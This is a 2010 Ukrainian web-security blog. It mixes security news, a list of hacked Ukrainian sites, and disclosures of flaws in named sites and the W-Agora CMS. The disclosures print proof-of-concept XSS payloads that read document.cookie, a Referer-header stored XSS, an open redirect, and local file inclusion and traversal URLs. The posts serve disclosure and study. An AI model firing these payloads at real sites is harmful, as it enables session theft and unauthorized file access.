Цікаві записи на тему веб безпеки

22:32 29.10.2010

Продовжуючи традицію, пропоную вашій увазі добірку цікавих записів на тему веб безпеки. Цього разу записи на тему Гугла, який в останній час почав активно позиціонувати себе як секюріті компанія та пропонувати послуги безпеки для клієнтів.

В своєму записі Google Redirects Help Phishers Again, RSnake в черговий раз навів приклад, коли редиректори Гулга використовувалися для фішинга. Я сам багато разів зустрічав в емайл листах використиння редиректорів пошукових систем для фішинга, в тому числі редиректорів Гугла і Яндекса.

В своєму записі Phishing Through Google (Yet Again), RSnake знову розповів про чергове використання редиректорів Гулга для фішинга. І те, що з роками Гугл почав виправляти деякі відкриті редиректори на своїх сайтах, це ще не значить, що вони виправили всі редиректори (до того ж з часом з’являються нові).

Тому їм ще є куди покращувати безпеку своїх сайтів, в тому числі стосовно Redirector уразливостей. Про атаки через відкриті та закриті редиректори, я раніше писав в своїх статтях.

В своєму записі Phishing With Google Wave, RSnake розповідає про фішинг атаку через Google Wave. На початку цього року Гугл випустив свою нову розробку Wave, в якій одразу ж знайшли уразливості, які в тому числі можна було використати для фішинг атак на користувачів Wave.

Новини: Лабораторія Касперського, сумський хакер та діяльність МВС у Миколаєві

19:27 29.10.2010

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням hackzona.com.ua, хакери зламали американський сайт “Лабораторії Касперського”.

Американський сайт “Лабораторії Касперського” був взломаний невідомими зловмисниками, тому що при зверненні до нього він почав поширювати шкідливе програмне забезпечення.

Згідно з повідомленнями користувачів на форумі компанії, взлом стався 17.10.2010 і шкідливе програмне забезпечення було присутнє на сайті щонайменше три з половиною години. Торік сайт Лабораторії Касперського (основний сайт ЛК) вже взламували.

За повідомленням sbu.gov.ua, на Сумщині за матеріалами СБУ засуджено хакера.

Набув чинності вирок суду за кримінальною справою, порушеною СБУ стосовно громадянина України, який несанкціоновано втручався в роботу одного з провідних інформаційних порталів на Сумщині. У квітні 2010 року житель обласного центру незаконно проникнув до серверу інформаційного порталу, створеного та функціонуючого за підтримки органів місцевої влади, та отримав повний доступ до всіх файлів сайту, у тому числі, конфіденційних.

За повідомленням internetua.com, у Миколаєві затримали людей, що поширювали порно в Інтернеті.

На миколаївських редакторів і адмінів порносайтів заведена кримінальна справа. Про що повідомив відділ по зв’язках із громадськістю УМВС України в Миколаївській області.

Уразливості на www.rccc.org

16:15 29.10.2010

22.02.2010

У липні, 06.07.2009, я знайшов Cross-Site Scripting та Redirector уразливості на проекті http://www.rccc.org. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.10.2010

XSS (Remote XSS Include):

http://www.rccc.org/common/group.asp?url=javascript:alert(document.cookie)

Redirector (Remote HTML Include):

http://www.rccc.org/common/group.asp?url=http://websecurity.com.ua

Дані уразливості вже виправлені шляхом видалення уразливого веб додатку.

Добірка уразливостей

22:39 28.10.2010

В даній добірці уразливості в веб додатках:

Похакані сайти №118

19:21 28.10.2010

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://vipconsulting.com.ua (хакером NET MAN) - 22.10.2010, зараз сайт вже виправлений адмінами
  • http://www.videojournal.dp.ua (хакерами з Black HaT Group)
  • http://peswe.com (хакером Z0ne) - 24.10.2010, був похаканий форум сайта, що вже виправлений адмінами
  • http://domkofe-saeco.com (хакером NuLSKip) - 10.2010 - сайт був взломаний та інфікований, але зараз вже виправлений адмінами
  • http://yogadance.com.ua (хакером GothX)

Уразливість на kinozalka.com

15:07 28.10.2010

10.02.2010

У червні, 29.06.2009, я знайшов Cross-Site Scripting уразливість на проекті http://kinozalka.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

28.10.2010

XSS:

На cторінках сайта http://kinozalka.com в блоці “У нас искали” через поле Referer. Це persistent XSS уразливість.

Referer: http://www.google.com/search?q=xss"><script>alert(document.cookie)</script>

Дана уразливість не була виправлена адміном. І як я сьогодні виявив, він закрив свій сайт і зараз даний домен використовується PPC-шниками для заробляння на кліках.

Цікавий хак державного сайта

22:43 27.10.2010

Про цікаву ситуацію с одним державним сайтом повідомив мені один мій активний читач. Даний випадок я оцінюю як цікавий хак державного сайта.

За адресою http://www.build.gov.ua знаходиться сайт Державного комітету України по будівництву й архітектурі. Так от, зараз там знаходиться версія сайта http://mastershin.com.ua (який є інтернет магазином). Чому на державному домені знаходиться сайт інтернет магазину - це питання до державних органів, що відповідають за сайт, та до власників даного онлайн магазину.

Чи причетні вони до цього взлому, чи ні, але в будь-якому разі він має місце. І в даний момент контроль над сайтом http://www.build.gov.ua здійснюється “на користь” компанії “Мастер шин”, що є власником даного інтернет магазину.

Я не виключаю, що можливим мотивом цього взлому був black SEO. Про декілька випадків black SEO атак на сайти в Уанеті я вже в цьому році розповідав.

Безпека від Гугла - Google Web Security

19:08 27.10.2010

Продовжуючи розпочату традицію, після попереднього відео про використання HTTP Parameter Pollution, пропоную нове відео на веб секюріті тематику. Цього разу відео про новий секюріті продукт від Гугла - Google Web Security. Рекомендую подивитися всім хто цікавиться цією темою.

Google Web Security

В відео розповідається про сучасний стан безпеки в Інтернет, про різніцю між веб фільтрацією та веб безпекою, та про переваги такого метода як веб безпека над веб фільтрацією. А також в загальних рисах розповідається про новий хмарний (cloud) секюріті продукт від Google. Єдине питання тут в тому, чи довірите ви свою безпеку такій компаній як Гугл :-) .

Рекомендую подивитися дане відео для розуміння сучасної ситуації з безпекою в Інтернет.

XSS та LFI уразливості в W-Agora

15:21 27.10.2010

29.08.2010

У серпні, 27.08.2010, я знайшов Cross-Site Scripting та Local File Inclusion уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я також виявив на сайті maidan.org.ua, як і попередні уразливості. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

27.10.2010

XSS:

http://site/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
http://site/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Уразливість працює в версії 4.1.5, але не працює в 4.2.1.

http://site/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

Local File Inclusion:

В папці conf:

http://site/news/for-print.php3?bn=1

http://site/news/login.php3?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/news/for-print.php3?bn=..\1

http://site/news/login.php3?bn=..\1

Уразливі W-Agora 4.2.1 та попередні версії. В останніх версіях системи скрипти php3 мають розширення php. Якщо адміни maidan.org.ua виправили уразливості, то розробник системи дані уразливості не виправив (але після публікації попередніх дірок в багтреках, розробник схоже почав їх виправляти, як мінімум виправив зазначені XSS на офіційному сайті системи).

Жовтневий вівторок патчів від Microsoft

22:40 26.10.2010

В жовтні місяці Microsoft випустила 16 патчів. Що значно більше ніж у вересні. Що стало новим рекордом (попередній був у серпні, коли компанія випустила 14 патчів).

У жовтневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 16 бюлетней по безпеці. Що закривають 49 уразливостей в програмних продуктах компанії (що також є рекордом). В тому числі чотири патчі виправляють критичні уразливості, які дозволяють виконати довільний шкідливий код на віддаленому комп’ютері, ще десять важливих патчів і два патчі середньої важливості.

Дані патчі стосуються таких продуктів Microsoft як операційні системи Windows XP, Windows Server 2003, Windows Vista, Windows 7, Windows Server 2008 R2, додатків Microsoft Office, браузера Internet Explorer та платформи .NET.